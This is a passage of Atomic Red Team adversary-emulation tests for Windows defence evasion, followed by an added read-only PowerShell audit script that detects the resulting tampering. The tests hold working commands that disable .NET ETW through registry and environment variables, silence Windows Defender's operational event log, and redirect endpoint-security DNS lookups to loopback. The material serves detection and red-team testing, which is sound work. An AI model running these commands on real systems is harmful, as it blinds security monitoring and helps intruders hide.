Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry.
Supported Platforms: Windows
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
Cleanup Commands
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW provider of Windows Defender, so nothing is logged to Microsoft-Windows-Windows-Defender/Operational anymore. Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
Cleanup Commands
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW provider of Windows Defender, so nothing is logged to Microsoft-Windows-Windows-Defender/Operational anymore. Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
Cleanup Commands
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry hive using the reg.exe utility. For the change to take effect, a logout might be required.
Supported Platforms: Windows
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
Attack Commands: Run with command_prompt!
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
Cleanup Commands
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry hive using PowerShell. For the change to take effect, a logout might be required.
Supported Platforms: Windows
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
Attack Commands: Run with powershell!
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
Cleanup Commands
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry hive using the reg.exe utility. For the change to take effect, a reboot might be required.
Supported Platforms: Windows
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
Cleanup Commands
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry hive using PowerShell. For the change to take effect, a reboot might be required.
Supported Platforms: Windows
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
Cleanup Commands
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries may redirect DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test makes the resolver answer with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
Supported Platforms: Windows
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
Cleanup Commands
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
Atomic test(s) for this technique last updated: 2026-05-02 03:10:14 UTC
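As a defender-side counterpart to the registry and NRPT tests above (Atomic Tests #56 through #60 and #68 through #76), the following read-only audit reports any of those locations left in the tampered state. It is an added example written for this page, not Atomic Red Team code; it generalizes #59/#60 to every provider under the EventLog-Application session, and assumes the DnsClient module (Get-DnsClientNrptRule) is present, as it is on supported Windows releases. The function names are my own.

```powershell
# Added example, not part of Atomic Red Team: a read-only audit of the registry
# values and NRPT rules that Atomic Tests #56 through #60 and #68 through #76
# change. Run from an elevated PowerShell session on the host under review.
# Paths and value names come from the tests above; function names are my own.

# Where each test writes, the value it sets, and the data that means "disabled".
# Data is compared as a string so REG_DWORD 0 and REG_SZ "0" both match.
$TamperChecks = @(
    @{ Test = '#56 AmsiEnable=0 for scripting hosts'
       Path = 'HKCU:\Software\Microsoft\Windows Script\Settings'
       Name = 'AmsiEnable'; Bad = '0' }
    @{ Test = '#57/#58 EventLog-Application autologger Start=0'
       Path = 'HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application'
       Name = 'Start'; Bad = '0' }
    @{ Test = '#68/#69 .NET Framework ETWEnabled=0'
       Path = 'HKLM:\Software\Microsoft\.NETFramework'
       Name = 'ETWEnabled'; Bad = '0' }
    @{ Test = '#70/#71 Defender operational channel Enabled=0'
       Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational'
       Name = 'Enabled'; Bad = '0' }
    @{ Test = '#72/#73 COMPlus_ETWEnabled=0 (user environment)'
       Path = 'HKCU:\Environment'
       Name = 'COMPlus_ETWEnabled'; Bad = '0' }
    @{ Test = '#74/#75 COMPlus_ETWEnabled=0 (machine environment)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
       Name = 'COMPlus_ETWEnabled'; Bad = '0' }
)

function Get-TamperedValue {
    param([Parameter(Mandatory)][hashtable]$Check)
    # A missing key or value is the normal state for most of these locations, so
    # only a value that is present and holds the "disabled" data is reported.
    if (-not (Test-Path -LiteralPath $Check.Path)) { return }
    $item = Get-ItemProperty -LiteralPath $Check.Path -Name $Check.Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return }
    $data = $item.($Check.Name)
    if ("$data" -eq $Check.Bad) {
        [pscustomobject]@{ Test = $Check.Test; Path = $Check.Path; Name = $Check.Name; Data = $data }
    }
}

function Get-DisabledAutologgerProvider {
    # Tests #59/#60 default to the SenseIR GUID but take any provider GUID as input,
    # so every provider subkey of the session is checked rather than one fixed GUID.
    # A provider your baseline deliberately disables should be allow-listed here.
    $session = 'HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application'
    Get-ChildItem -LiteralPath $session -ErrorAction SilentlyContinue | ForEach-Object {
        $enabled = (Get-ItemProperty -LiteralPath $_.PSPath -Name Enabled -ErrorAction SilentlyContinue).Enabled
        if ($enabled -eq 0) {
            [pscustomobject]@{ Test = '#59/#60 provider Enabled=0 in EventLog-Application'
                               Path = $_.PSPath; Name = 'Enabled'; Data = $enabled }
        }
    }
}

function Get-LoopbackNrptRule {
    # Test #76 silences a namespace by answering it from 127.0.0.1. Any NRPT rule
    # whose name servers are all loopback addresses has the same effect, so flag those.
    Get-DnsClientNrptRule -ErrorAction SilentlyContinue | Where-Object {
        $servers = @($_.NameServers)
        $nonLoopback = @($servers | Where-Object { $_ -notmatch '^(127\.\d{1,3}\.\d{1,3}\.\d{1,3}|::1)$' })
        ($servers.Count -gt 0) -and ($nonLoopback.Count -eq 0)
    } | Select-Object Name, Namespace, NameServers, Comment
}

function Invoke-ImpairDefensesAudit {
    $values = @(foreach ($check in $TamperChecks) { Get-TamperedValue -Check $check })
    $values += @(Get-DisabledAutologgerProvider)
    $rules = @(Get-LoopbackNrptRule)
    # Tables go to the host so the function's return value stays a plain count.
    if ($values.Count) { $values | Format-Table -AutoSize -Wrap | Out-Host } else { Write-Host 'No tampered registry values found.' }
    if ($rules.Count)  { $rules  | Format-Table -AutoSize -Wrap | Out-Host } else { Write-Host 'No loopback NRPT rules found.' }
    return $values.Count + $rules.Count
}

$findingCount = Invoke-ImpairDefensesAudit
Write-Host "Total findings: $findingCount"
```

Running it right after the cleanup commands of each test should report zero findings; a non-zero count after cleanup points at a value the cleanup did not restore.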